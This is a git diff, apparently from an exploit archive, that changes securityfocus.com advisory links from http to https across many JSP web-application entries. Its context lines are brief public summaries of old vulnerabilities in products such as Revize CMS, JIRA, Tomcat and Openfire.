@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15481/info +source: https://www.securityfocus.com/bid/15481/info Revize CMS is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/jsp/webapps/26533.txt b/exploits/jsp/webapps/26533.txt index bdfae0ed3..d1159b63e 100644 --- a/exploits/jsp/webapps/26533.txt +++ b/exploits/jsp/webapps/26533.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15482/info +source: https://www.securityfocus.com/bid/15482/info Revize CMS is prone to an information disclosure vulnerability. This issue is due to a failure in the application to restrict access to sensitive files. diff --git a/exploits/jsp/webapps/26534.txt b/exploits/jsp/webapps/26534.txt index 84bc6323a..3626f1e4b 100644 --- a/exploits/jsp/webapps/26534.txt +++ b/exploits/jsp/webapps/26534.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15484/info +source: https://www.securityfocus.com/bid/15484/info Revize CMS is prone to a cross-site scripting vulnerabilities. This is due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/jsp/webapps/26700.txt b/exploits/jsp/webapps/26700.txt index e19c6f30f..e8d9a7444 100644 --- a/exploits/jsp/webapps/26700.txt +++ b/exploits/jsp/webapps/26700.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15687/info +source: https://www.securityfocus.com/bid/15687/info Java Search Engine is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/26778.txt b/exploits/jsp/webapps/26778.txt index c57b0a90f..75a6b6448 100644 --- a/exploits/jsp/webapps/26778.txt +++ b/exploits/jsp/webapps/26778.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15814/info +source: https://www.securityfocus.com/bid/15814/info Blackboard Academic Suite is prone to a cross-domain frameset-loading vulnerability. diff --git a/exploits/jsp/webapps/26924.txt b/exploits/jsp/webapps/26924.txt index a293e9ac2..e2eeec14b 100644 --- a/exploits/jsp/webapps/26924.txt +++ b/exploits/jsp/webapps/26924.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16004/info +source: https://www.securityfocus.com/bid/16004/info OpenEdit is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/26972.txt b/exploits/jsp/webapps/26972.txt index 443250a4d..1a2aa9e0f 100644 --- a/exploits/jsp/webapps/26972.txt +++ b/exploits/jsp/webapps/26972.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16048/info +source: https://www.securityfocus.com/bid/16048/info Oracle Application Server Discussion Forum Portlet is affected by multiple remote vulnerabilities. diff --git a/exploits/jsp/webapps/27463.txt b/exploits/jsp/webapps/27463.txt index 1a10f734c..5a87b598f 100644 --- a/exploits/jsp/webapps/27463.txt +++ b/exploits/jsp/webapps/27463.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17210/info +source: https://www.securityfocus.com/bid/17210/info IBM Tivoli Business Systems Manager is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/27558.txt b/exploits/jsp/webapps/27558.txt index 783715353..6921299fe 100644 --- a/exploits/jsp/webapps/27558.txt +++ b/exploits/jsp/webapps/27558.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17351/info +source: https://www.securityfocus.com/bid/17351/info Bugzero is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/27559.txt b/exploits/jsp/webapps/27559.txt index 001128d46..d6d047f5e 100644 --- a/exploits/jsp/webapps/27559.txt +++ b/exploits/jsp/webapps/27559.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17351/info +source: https://www.securityfocus.com/bid/17351/info Bugzero is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/27684.txt b/exploits/jsp/webapps/27684.txt index d70080fa2..1a7607d99 100644 --- a/exploits/jsp/webapps/27684.txt +++ b/exploits/jsp/webapps/27684.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17604/info +source: https://www.securityfocus.com/bid/17604/info CiscoWorks Wireless LAN Solution Engine (WLSE) is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/28278.txt b/exploits/jsp/webapps/28278.txt index d500f7741..2677c6f94 100644 --- a/exploits/jsp/webapps/28278.txt +++ b/exploits/jsp/webapps/28278.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19174/info +source: https://www.securityfocus.com/bid/19174/info OpenCMS is prone to multiple unauthorized-access vulnerabilities because it fails to properly authenticate users when performing administrative tasks. diff --git a/exploits/jsp/webapps/28605.txt b/exploits/jsp/webapps/28605.txt index 079a4f0e1..e1340716b 100644 --- a/exploits/jsp/webapps/28605.txt +++ b/exploits/jsp/webapps/28605.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20109/info +source: https://www.securityfocus.com/bid/20109/info Neon WebMail is prone to multiple input-validation vulnerabilities because it fails to sanitize user-supplied input. These issues include: diff --git a/exploits/jsp/webapps/28606.txt b/exploits/jsp/webapps/28606.txt index 01c6732aa..cfc8a2f55 100644 --- a/exploits/jsp/webapps/28606.txt +++ b/exploits/jsp/webapps/28606.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20109/info +source: https://www.securityfocus.com/bid/20109/info Neon WebMail is prone to multiple input-validation vulnerabilities because it fails to sanitize user-supplied input. These issues include: diff --git a/exploits/jsp/webapps/28607.txt b/exploits/jsp/webapps/28607.txt index 8eb7cdae5..a23c93f99 100644 --- a/exploits/jsp/webapps/28607.txt +++ b/exploits/jsp/webapps/28607.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20109/info +source: https://www.securityfocus.com/bid/20109/info Neon WebMail is prone to multiple input-validation vulnerabilities because it fails to sanitize user-supplied input. These issues include: diff --git a/exploits/jsp/webapps/28608.txt b/exploits/jsp/webapps/28608.txt index 6e6908dc7..377209c81 100644 --- a/exploits/jsp/webapps/28608.txt +++ b/exploits/jsp/webapps/28608.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20109/info +source: https://www.securityfocus.com/bid/20109/info Neon WebMail is prone to multiple input-validation vulnerabilities because it fails to sanitize user-supplied input. These issues include: diff --git a/exploits/jsp/webapps/28609.txt b/exploits/jsp/webapps/28609.txt index a3b910900..9bb9c45fa 100644 --- a/exploits/jsp/webapps/28609.txt +++ b/exploits/jsp/webapps/28609.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20109/info +source: https://www.securityfocus.com/bid/20109/info Neon WebMail is prone to multiple input-validation vulnerabilities because it fails to sanitize user-supplied input. These issues include: diff --git a/exploits/jsp/webapps/28610.txt b/exploits/jsp/webapps/28610.txt index 38edd9a56..0aebe0f72 100644 --- a/exploits/jsp/webapps/28610.txt +++ b/exploits/jsp/webapps/28610.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20109/info +source: https://www.securityfocus.com/bid/20109/info Neon WebMail is prone to multiple input-validation vulnerabilities because it fails to sanitize user-supplied input. These issues include: diff --git a/exploits/jsp/webapps/29301.txt b/exploits/jsp/webapps/29301.txt index 4f7a211be..7ba15502e 100644 --- a/exploits/jsp/webapps/29301.txt +++ b/exploits/jsp/webapps/29301.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21686/info +source: https://www.securityfocus.com/bid/21686/info Oracle Portal is prone to multiple HTTP response-splitting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/29576.txt b/exploits/jsp/webapps/29576.txt index 3a87ad602..7dbe4b7dd 100644 --- a/exploits/jsp/webapps/29576.txt +++ b/exploits/jsp/webapps/29576.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22503/info +source: https://www.securityfocus.com/bid/22503/info Atlassian JIRA is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/29811.txt b/exploits/jsp/webapps/29811.txt index c600887b7..8211cab57 100644 --- a/exploits/jsp/webapps/29811.txt +++ b/exploits/jsp/webapps/29811.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23244/info +source: https://www.securityfocus.com/bid/23244/info Atlassian JIRA is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/30189.txt b/exploits/jsp/webapps/30189.txt index ddc400f3c..7fe0c30e5 100644 --- a/exploits/jsp/webapps/30189.txt +++ b/exploits/jsp/webapps/30189.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24476/info +source: https://www.securityfocus.com/bid/24476/info Apache Tomcat is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/30191.txt b/exploits/jsp/webapps/30191.txt index bcd0a33f9..c350bb33a 100644 --- a/exploits/jsp/webapps/30191.txt +++ b/exploits/jsp/webapps/30191.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24480/info +source: https://www.securityfocus.com/bid/24480/info Apache Tomahawk MyFaces JSF Framework is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/30266.txt b/exploits/jsp/webapps/30266.txt index 54b2f7fff..715e0aaf7 100644 --- a/exploits/jsp/webapps/30266.txt +++ b/exploits/jsp/webapps/30266.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24766/info +source: https://www.securityfocus.com/bid/24766/info NetFlow Analyzer is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/30267.txt b/exploits/jsp/webapps/30267.txt index 70c205b33..f1f9f8876 100644 --- a/exploits/jsp/webapps/30267.txt +++ b/exploits/jsp/webapps/30267.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24766/info +source: https://www.securityfocus.com/bid/24766/info NetFlow Analyzer is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/30268.txt b/exploits/jsp/webapps/30268.txt index 0fba4bfe6..6a2e11bd9 100644 --- a/exploits/jsp/webapps/30268.txt +++ b/exploits/jsp/webapps/30268.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24766/info +source: https://www.securityfocus.com/bid/24766/info NetFlow Analyzer is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/30269.txt b/exploits/jsp/webapps/30269.txt index 4835829de..c0c1df0d2 100644 --- a/exploits/jsp/webapps/30269.txt +++ b/exploits/jsp/webapps/30269.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24766/info +source: https://www.securityfocus.com/bid/24766/info NetFlow Analyzer is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/30270.txt b/exploits/jsp/webapps/30270.txt index d4b2b4291..a2adf6704 100644 --- a/exploits/jsp/webapps/30270.txt +++ b/exploits/jsp/webapps/30270.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24766/info +source: https://www.securityfocus.com/bid/24766/info NetFlow Analyzer is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/30563.txt b/exploits/jsp/webapps/30563.txt index 07caa8367..597f02113 100644 --- a/exploits/jsp/webapps/30563.txt +++ b/exploits/jsp/webapps/30563.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25531/info +source: https://www.securityfocus.com/bid/25531/info Apache Tomcat is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/30608.txt b/exploits/jsp/webapps/30608.txt index 21e3fef2f..29424e54c 100644 --- a/exploits/jsp/webapps/30608.txt +++ b/exploits/jsp/webapps/30608.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25803/info +source: https://www.securityfocus.com/bid/25803/info JSPWiki is prone to multiple input-validation vulnerabilities, including multiple cross-site scripting issues and an HTML-injection issue, because the application fails to adequately sanitize user-supplied input. diff --git a/exploits/jsp/webapps/30609.txt b/exploits/jsp/webapps/30609.txt index 393a9dc7c..7d13a2a35 100644 --- a/exploits/jsp/webapps/30609.txt +++ b/exploits/jsp/webapps/30609.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25803/info +source: https://www.securityfocus.com/bid/25803/info JSPWiki is prone to multiple input-validation vulnerabilities, including multiple cross-site scripting issues and an HTML-injection issue, because the application fails to adequately sanitize user-supplied input. diff --git a/exploits/jsp/webapps/30610.txt b/exploits/jsp/webapps/30610.txt index bbb4155e7..28a71ddbc 100644 --- a/exploits/jsp/webapps/30610.txt +++ b/exploits/jsp/webapps/30610.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25803/info +source: https://www.securityfocus.com/bid/25803/info JSPWiki is prone to multiple input-validation vulnerabilities, including multiple cross-site scripting issues and an HTML-injection issue, because the application fails to adequately sanitize user-supplied input. diff --git a/exploits/jsp/webapps/30611.txt b/exploits/jsp/webapps/30611.txt index 997b1f732..8d1d687c2 100644 --- a/exploits/jsp/webapps/30611.txt 
+++ b/exploits/jsp/webapps/30611.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25803/info +source: https://www.securityfocus.com/bid/25803/info JSPWiki is prone to multiple input-validation vulnerabilities, including multiple cross-site scripting issues and an HTML-injection issue, because the application fails to adequately sanitize user-supplied input. diff --git a/exploits/jsp/webapps/30612.txt b/exploits/jsp/webapps/30612.txt index 1288a0eb8..bef252d5b 100644 --- a/exploits/jsp/webapps/30612.txt +++ b/exploits/jsp/webapps/30612.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25803/info +source: https://www.securityfocus.com/bid/25803/info JSPWiki is prone to multiple input-validation vulnerabilities, including multiple cross-site scripting issues and an HTML-injection issue, because the application fails to adequately sanitize user-supplied input. diff --git a/exploits/jsp/webapps/30613.txt b/exploits/jsp/webapps/30613.txt index c5fb044b2..91e01d57f 100644 --- a/exploits/jsp/webapps/30613.txt +++ b/exploits/jsp/webapps/30613.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25803/info +source: https://www.securityfocus.com/bid/25803/info JSPWiki is prone to multiple input-validation vulnerabilities, including multiple cross-site scripting issues and an HTML-injection issue, because the application fails to adequately sanitize user-supplied input. diff --git a/exploits/jsp/webapps/30675.txt b/exploits/jsp/webapps/30675.txt index 447e4bf03..273234739 100644 --- a/exploits/jsp/webapps/30675.txt +++ b/exploits/jsp/webapps/30675.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26084/info +source: https://www.securityfocus.com/bid/26084/info InnovaShop is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/30676.txt b/exploits/jsp/webapps/30676.txt index 8ee15e4fb..870e27d6e 100644 
--- a/exploits/jsp/webapps/30676.txt +++ b/exploits/jsp/webapps/30676.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26084/info +source: https://www.securityfocus.com/bid/26084/info InnovaShop is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/30704.txt b/exploits/jsp/webapps/30704.txt index f672edcde..8a1be31d6 100644 --- a/exploits/jsp/webapps/30704.txt +++ b/exploits/jsp/webapps/30704.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26182/info +source: https://www.securityfocus.com/bid/26182/info GHBoard is prone to multiple vulnerabilities that let attackers upload and download arbitrary files and execute arbitrary code within the context of the webserver process. diff --git a/exploits/jsp/webapps/30705.txt b/exploits/jsp/webapps/30705.txt index 60ae83e31..26903cdcb 100644 --- a/exploits/jsp/webapps/30705.txt +++ b/exploits/jsp/webapps/30705.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26182/info +source: https://www.securityfocus.com/bid/26182/info GHBoard is prone to multiple vulnerabilities that let attackers upload and download arbitrary files and execute arbitrary code within the context of the webserver process. diff --git a/exploits/jsp/webapps/31004.txt b/exploits/jsp/webapps/31004.txt index ebcd81903..4625c4974 100644 --- a/exploits/jsp/webapps/31004.txt +++ b/exploits/jsp/webapps/31004.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27214/info +source: https://www.securityfocus.com/bid/27214/info Sun Java System Identity Manager is prone to multiple input-validation vulnerabilities, including an HTML-injection issue and cross-site scripting issues, because it fails to adequately sanitize user-supplied input. diff --git a/exploits/jsp/webapps/31005.txt b/exploits/jsp/webapps/31005.txt index d01ba7111..72bfddba2 100644 --- a/exploits/jsp/webapps/31005.txt 
+++ b/exploits/jsp/webapps/31005.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27214/info +source: https://www.securityfocus.com/bid/27214/info Sun Java System Identity Manager is prone to multiple input-validation vulnerabilities, including an HTML-injection issue and cross-site scripting issues, because it fails to adequately sanitize user-supplied input. diff --git a/exploits/jsp/webapps/31006.txt b/exploits/jsp/webapps/31006.txt index a761abba6..56dff9a2a 100644 --- a/exploits/jsp/webapps/31006.txt +++ b/exploits/jsp/webapps/31006.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27214/info +source: https://www.securityfocus.com/bid/27214/info Sun Java System Identity Manager is prone to multiple input-validation vulnerabilities, including an HTML-injection issue and cross-site scripting issues, because it fails to adequately sanitize user-supplied input. diff --git a/exploits/jsp/webapps/31007.txt b/exploits/jsp/webapps/31007.txt index b83dc8bad..b0dfa8789 100644 --- a/exploits/jsp/webapps/31007.txt +++ b/exploits/jsp/webapps/31007.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27214/info +source: https://www.securityfocus.com/bid/27214/info Sun Java System Identity Manager is prone to multiple input-validation vulnerabilities, including an HTML-injection issue and cross-site scripting issues, because it fails to adequately sanitize user-supplied input. diff --git a/exploits/jsp/webapps/31299.txt b/exploits/jsp/webapps/31299.txt index db5730c0d..dad137ed1 100644 --- a/exploits/jsp/webapps/31299.txt +++ b/exploits/jsp/webapps/31299.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27986/info +source: https://www.securityfocus.com/bid/27986/info Alkacon OpenCms is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/31445.txt b/exploits/jsp/webapps/31445.txt index 3d8e31e73..2c97437c5 100644 
--- a/exploits/jsp/webapps/31445.txt +++ b/exploits/jsp/webapps/31445.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28352/info +source: https://www.securityfocus.com/bid/28352/info Elastic Path is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/31446.txt b/exploits/jsp/webapps/31446.txt index 6554282fb..4d3cf46bc 100644 --- a/exploits/jsp/webapps/31446.txt +++ b/exploits/jsp/webapps/31446.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28352/info +source: https://www.securityfocus.com/bid/28352/info Elastic Path is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/31475.txt b/exploits/jsp/webapps/31475.txt index 3d3e88cf4..df615b07d 100644 --- a/exploits/jsp/webapps/31475.txt +++ b/exploits/jsp/webapps/31475.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28411/info +source: https://www.securityfocus.com/bid/28411/info Alkacon OpenCms is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/32046.txt b/exploits/jsp/webapps/32046.txt index 5ddbdd5cc..65ba17f28 100644 --- a/exploits/jsp/webapps/32046.txt +++ b/exploits/jsp/webapps/32046.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30180/info +source: https://www.securityfocus.com/bid/30180/info IBM Maximo is prone to multiple HTML-injection vulnerabilities and an information-disclosure vulnerability. diff --git a/exploits/jsp/webapps/32249.txt b/exploits/jsp/webapps/32249.txt index 8e8d6c268..2b9e00c00 100644 --- a/exploits/jsp/webapps/32249.txt +++ b/exploits/jsp/webapps/32249.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30696/info +source: https://www.securityfocus.com/bid/30696/info Openfire is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/jsp/webapps/32423.txt b/exploits/jsp/webapps/32423.txt index 764f79474..e4b8757fe 100644 --- a/exploits/jsp/webapps/32423.txt +++ b/exploits/jsp/webapps/32423.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31410/info +source: https://www.securityfocus.com/bid/31410/info OpenNMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/32424.txt b/exploits/jsp/webapps/32424.txt index 0ad5f9f64..7ba58fd38 100644 --- a/exploits/jsp/webapps/32424.txt +++ b/exploits/jsp/webapps/32424.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31410/info +source: https://www.securityfocus.com/bid/31410/info OpenNMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/32425.txt b/exploits/jsp/webapps/32425.txt index b726f0cf0..2613c0223 100644 --- a/exploits/jsp/webapps/32425.txt +++ b/exploits/jsp/webapps/32425.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31410/info +source: https://www.securityfocus.com/bid/31410/info OpenNMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/32579.html b/exploits/jsp/webapps/32579.html index 0fe962540..c0ad69f27 100644 --- a/exploits/jsp/webapps/32579.html +++ b/exploits/jsp/webapps/32579.html 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32262/info +source: https://www.securityfocus.com/bid/32262/info Sun Java System Identity Manager is prone to multiple web-interface vulnerabilities, including a cross-site request-forgery issue, multiple cross-site scripting issues, multiple HTML-injection issues, and a directory-traversal vulnerability. diff --git a/exploits/jsp/webapps/32655.txt b/exploits/jsp/webapps/32655.txt index 196541c5e..c33fbf9d0 100644 --- a/exploits/jsp/webapps/32655.txt +++ b/exploits/jsp/webapps/32655.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32782/info +source: https://www.securityfocus.com/bid/32782/info Multiple Ad Server Solutions products are prone to SQL-injection vulnerabilities because they fail to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/jsp/webapps/32677.txt b/exploits/jsp/webapps/32677.txt index dbeb5237a..088a1516e 100644 --- a/exploits/jsp/webapps/32677.txt +++ b/exploits/jsp/webapps/32677.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32937/info +source: https://www.securityfocus.com/bid/32937/info Openfire is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/jsp/webapps/32678.txt b/exploits/jsp/webapps/32678.txt index 784c57611..b1469b1a0 100644 --- a/exploits/jsp/webapps/32678.txt +++ b/exploits/jsp/webapps/32678.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32938/info +source: https://www.securityfocus.com/bid/32938/info Openfire is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/jsp/webapps/32679.txt b/exploits/jsp/webapps/32679.txt index 0e2bd8392..ae5a2e19c 100644 --- a/exploits/jsp/webapps/32679.txt +++ b/exploits/jsp/webapps/32679.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32940/info +source: https://www.securityfocus.com/bid/32940/info Openfire is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/jsp/webapps/32680.txt b/exploits/jsp/webapps/32680.txt index 19a474f29..14e7de883 100644 --- a/exploits/jsp/webapps/32680.txt +++ b/exploits/jsp/webapps/32680.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32945/info +source: https://www.securityfocus.com/bid/32945/info Openfire is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/jsp/webapps/32708.txt b/exploits/jsp/webapps/32708.txt index 5616e2aa6..78aba8982 100644 --- a/exploits/jsp/webapps/32708.txt +++ b/exploits/jsp/webapps/32708.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33153/info +source: https://www.securityfocus.com/bid/33153/info Plunet BusinessManager is prone to multiple security-bypass and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/32709.txt b/exploits/jsp/webapps/32709.txt index c38e2b28a..eb3776e7d 100644 --- a/exploits/jsp/webapps/32709.txt +++ b/exploits/jsp/webapps/32709.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33153/info +source: https://www.securityfocus.com/bid/33153/info Plunet BusinessManager is prone to multiple security-bypass and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/32710.txt b/exploits/jsp/webapps/32710.txt index 02597bbd9..644490d6a 100644 --- a/exploits/jsp/webapps/32710.txt +++ b/exploits/jsp/webapps/32710.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33153/info +source: https://www.securityfocus.com/bid/33153/info Plunet BusinessManager is prone to multiple security-bypass and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/32741.txt b/exploits/jsp/webapps/32741.txt index adf2386bc..c258bfc77 100644 --- a/exploits/jsp/webapps/32741.txt +++ b/exploits/jsp/webapps/32741.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33360/info +source: https://www.securityfocus.com/bid/33360/info Apache Jackrabbit is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/jsp/webapps/32742.txt b/exploits/jsp/webapps/32742.txt index 9f71f65bd..d0b8ed357 100644 --- a/exploits/jsp/webapps/32742.txt +++ b/exploits/jsp/webapps/32742.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33360/info +source: https://www.securityfocus.com/bid/33360/info Apache Jackrabbit is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/jsp/webapps/33209.txt b/exploits/jsp/webapps/33209.txt index 66d8dfc51..ba7c1eb5c 100644 --- a/exploits/jsp/webapps/33209.txt +++ b/exploits/jsp/webapps/33209.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36245/info +source: https://www.securityfocus.com/bid/36245/info Adobe RoboHelp Server is prone to an authentication-bypass vulnerability. An attacker can exploit this issue to upload and execute arbitrary code with SYSTEM-level privileges. diff --git a/exploits/jsp/webapps/33292.txt b/exploits/jsp/webapps/33292.txt index 8dd4351fd..58304ed8b 100644 --- a/exploits/jsp/webapps/33292.txt +++ b/exploits/jsp/webapps/33292.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36721/info +source: https://www.securityfocus.com/bid/36721/info IBM Rational RequisitePro is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/33293.txt b/exploits/jsp/webapps/33293.txt index 515671d98..2f0dcbcfe 100644 --- a/exploits/jsp/webapps/33293.txt +++ b/exploits/jsp/webapps/33293.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36721/info +source: https://www.securityfocus.com/bid/36721/info IBM Rational RequisitePro is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/33346.txt b/exploits/jsp/webapps/33346.txt index 860c25133..3de322656 100644 --- a/exploits/jsp/webapps/33346.txt +++ b/exploits/jsp/webapps/33346.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37003/info +source: https://www.securityfocus.com/bid/37003/info McAfee Network Security Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/33347.txt b/exploits/jsp/webapps/33347.txt index 091fa3c53..4c0933b51 100644 --- a/exploits/jsp/webapps/33347.txt +++ b/exploits/jsp/webapps/33347.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37004/info +source: https://www.securityfocus.com/bid/37004/info McAfee Network Security Manager is prone to an information-disclosure vulnerability because it fails to properly protect sensitive cookie data with the 'HTTPOnly' protection mechanism. diff --git a/exploits/jsp/webapps/33564.txt b/exploits/jsp/webapps/33564.txt index 768828695..df0f73064 100644 --- a/exploits/jsp/webapps/33564.txt +++ b/exploits/jsp/webapps/33564.txt 
